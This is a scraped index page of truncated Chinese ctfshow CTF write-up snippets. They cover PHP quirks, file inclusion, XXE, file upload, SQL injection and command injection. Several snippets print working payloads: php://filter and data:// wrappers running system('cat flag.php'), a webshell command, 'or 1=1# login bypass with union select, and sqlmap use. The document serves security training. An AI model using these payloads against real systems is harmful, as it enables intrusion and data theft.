ICode9

精准搜索请尝试: 精确搜索
  • ctfshow_php特性2021-10-04 15:32:07

    web89 if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if(intval($num)){ echo $flag; } } 我们可以利用preg_match的特性,让第一个if判断为false pre

  • CTFshow web入门文件包含2021-10-04 09:06:36

    前言:看题 web78:     if(isset($_GET['file'])){         $file = $_GET['file'];         include($file);     }else{         highlight_file(__FILE__);     } 发现include是文件包含没错了,伪协议读取出来就可以了     exp:?file=php://filter/convert.ba

  • ctfshow_文件包含2021-10-04 01:05:17

    简单过一遍 web78 include($file) payload: php://filter/read=convert.base64-encode/resource=flag.php data://text/plain,<?=show_source('flag.php')?> web79 $file = str_replace("php", "???", $file); include($file); 使用上一题的dat

  • ctfshow web入门 文件包含2021-10-02 11:03:08

    web 78 在文件包含的题目中,php伪协议是非常常用的方法 php伪协议的利用 读取php源码要加base64过滤器 ?file=php://filter/convert.base64-encode/resource=flag.php   web 79 ?file=data://text/plain;base64,<?php system('cat flag.php'); ?> php给过滤掉了,用data协议执行PHP

  • CTFSHOW-日刷-[月饼杯]web2021-10-01 21:33:13

    此夜圆 下载查看源码 <?php error_reporting(0); class a { public $uname; public $password; public function __construct($uname,$password) { $this->uname=$uname; $this->password=$password; } public function __wakeup()

  • CTFSHOW WEB入门 PHP特性篇2021-09-28 19:32:26

    web89 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-16 11:25:09 # @Last Modified by: h1xa # @Last Modified time: 2020-09-18 15:38:51 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ include("flag.php"); highl

  • CTFSHOW web1-102021-09-23 22:02:14

    目录 我横竖睡不着,仔细看了半夜,才从代码里看出字来,满本都写着三个字是‘我好菜’!” web1/web签到题: web2 web3  web4 web5 web6  web7 web8 web9 web10 web1/web签到题: 没啥好说的,右键源代码出flag web2 猜闭合方式,加上万能密码得到回显:  接下来就是普通的union注入了。

  • 【20210920 ctfshow 月饼杯】Crypto方向部分WP2021-09-21 16:34:27

    月饼杯 艹是真的卡 文章目录 月饼杯Crypto-我的木头啊!!!Crypto-切记务必一定要简单(unsolved)Crypto-一封信Crypto-沐沐子倒拔垂杨柳ctfshow_login(unsolved) Crypto-我的木头啊!!! 我的宝贝木头怎么被别人拿去做了栅栏,该怎么让他把我的宝贝木头换回来 c6_I_@t216MG_0q_Uf673J

  • ctfshow信息搜集笔记2021-09-12 20:02:46

    ctfshow用字典是跑不出来的。 1.开发注释未及时删除 :按F12,在查看器里面。 2.js前台拦截 === 无效操作:BP拦截,转到repeater,进行转发。 查看源代码 通过在url头部添加 view-source: view-source是一种协议,在浏览器上直接查看网站源码。 3.没思路的时候抓个包看看,可能会有意外收

  • ctfshow web入门-XXE2021-09-10 13:01:07

    ctfshow web入门-XXE web373题目描述解题思路 web374题目描述解题思路 web375题目描述解题思路 web376题目描述解题思路 web377题目描述解题思路 web378题目描述解题思路 web373 题目描述 开X 解题思路 题目给出源码,一个有回显的文件读取漏洞 <?php error_reporting

  • CTFshow刷题日记-WEB-文件上传2021-09-08 19:58:51

    web151-前端绕过 简单只要在前端把exts:png改成php exts:'php' 访问 /upload/shell.php?shell=system("tac ../flag.php"); web152-content-type绕过 这次不改前端了,直接在bp改,将Content-Type改成 image/png 总结下常见conten-type类型 常见的媒体格式类型如下: text/ht

  • ctfshow web web22021-08-29 23:01:10

    打开容器,发现一个登陆框 输入admin 密码随便输入,用burp抓包,发送到Repeater模块   首先试试万能密码:’or 1=1#    username=admin'or 1=1#&password=123 发现登陆成功   接着查看回显位置:username=admin'or 1=1 union select 1,2,3#&password=123 发现有回显 接着就爆库爆

  • ctfshow_吃瓜杯_魔王_吃瓜_热身_binggo2021-08-17 20:31:45

    本来主要做web的,这次变成杂项了。。。 Misc游戏 多选killing即可,有flag选flag,其他看运气       吃瓜 下载发现一张png,没法打开,二进制查看发现是压缩包 改后缀zip 解压发现题目:   看文本内容:    发现是图片base64:找网站解码    扫码 cfhwc19abika_etso{h_u_e_ui

  • ctfshow_web入门 PHP特性——学习2021-08-06 21:35:34

    PHP特性 这里以半做题,半学习为主,所以就显得比较啰嗦 阿巴阿巴,但是实际上,写得比较水,等过一段时间再总结一下 比较深刻的印象是:下一个手册,多看手册 从web135还是几开始,就是看的这个师傅的博客了 web 89 if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9

  • ctfshow文件包含-超详解2021-08-05 20:03:47

    文件包含 web78-79 <?php if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } ?> 伪协议: ?file=php://filter/read=convert.base64-encode/resource=flag.php ?file=data://text/plain

  • ctfshow密码学crypto笔记2021-07-30 16:02:08

    #密码学签到 字符串逆序python脚本: letters = '}wohs.ftc{galf' a = list(letters) a.reverse() for s in a: print(s,end='') flag{ctf.show} crypto2 jjencode 编码,直接F12放到控制台,然后回车就可以解析了。

  • 命令注入ctfshow2021-07-20 21:29:33

    title: CTFshow命令注入 date: 2021-07-15 tags: [ctf] description: 刷题记录 搜索引擎http://helosec.com/ 正则解释https://regexper.com/ web31 <?php error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag|system|ph

  • ctfshow 签到_观己2021-07-15 13:00:29

    打开靶机地址,得到下图, 根据上图的php代码可以知道,该网址过滤了php的大小写,直接进行当前网页index.php的base64过滤也不可用,php://伪协议不可用,一句话木马不可用,但是我们可以用data://伪协议进行尝试,因为过滤大小写,所以咱们用base64的方法传入一句话木马。    根据网页返回可

  • ctfshow web308 ssrf2021-07-15 12:02:54

    在index.php里 $service = unserialize(base64_decode($_COOKIE['service'])); if($service){ $lastVersion=$service->checkVersion(); } 在dao.php中有checkVersion方法 checkUpdate function checkUpdate($url){ $ch=curl_init(); curl_setopt($ch, CURLO

  • ctfshow BabyMisc解析2021-07-14 00:01:33

    题目描述 1.压缩包密码是一个不大于一千万的6位数字 2.诶,图片咋回事。 解题思路 下载题目得到一个flag.zip,里边有一个flag.png,它是加密的需要密码才能打开.我们要想做出这道题必须先得到它的密码。然后这个图片可能直接就是flag,也可能做过一些修改,因为提示上说 诶,图片咋

  • ctfshow__黑盒测试2021-07-04 22:34:32

    web380-测试url参数 一开始什么也没有发现可以注入的地方,于是研究url参数。 发现每个页面都带有参数,如page_1.php,page_2.php啥的。 但是还是没有发现什么问题。 于是看了看别人的wp,发现page.php。 进去之后发现 $id.php很有问题。于是试了一下$id可不可以get传参进去,穿了

  • ctfshow_月饼杯2021-07-01 16:05:03

    文章目录 0x01 web1_此夜圆 (反序列化逃逸)0x03 web3_莫负婵娟 (LIKE盲注、$PATH环境变量截取字母) 0x01 web1_此夜圆 (反序列化逃逸) 下载附件拿到源码,是反序列化逃逸的题 懒得算,直接遍历Firebasky的数量 <?php error_reporting(0); class a { public $uname; public $passw

  • ctfshow misc32021-06-16 18:32:44

    题目提示很明白 看看自己下面? 我凭借我细致的观察,看到了sdf三个字母连在一起想到了asdf键盘 再一想,对啊就是键盘,在我头的下面没问题 果然答案出来了,就是 av flag{av}

  • CTFSHOW-web(7/11)2021-06-15 20:01:33

    文章目录 WEB07WEB11 WEB07 进入目录 可以发觉到本题考察的是sql盲注 尝试注入 经过测试,可以发现本题过滤了空格,在这里可以使用/**/进行代替 又是空格绕过,之前刚做过的在CTFHUB上空格绕过题,具体详细就不再细说 直接操作吧 爆数据库 python sqlmap.py -u "http://f66c0

  • CTFShow 命令执行2021-06-11 21:33:27

    web29 error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); } 题目过滤了flag,相当于什么也没过滤,姿势就有很多了 payload1:c=system(&quo

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有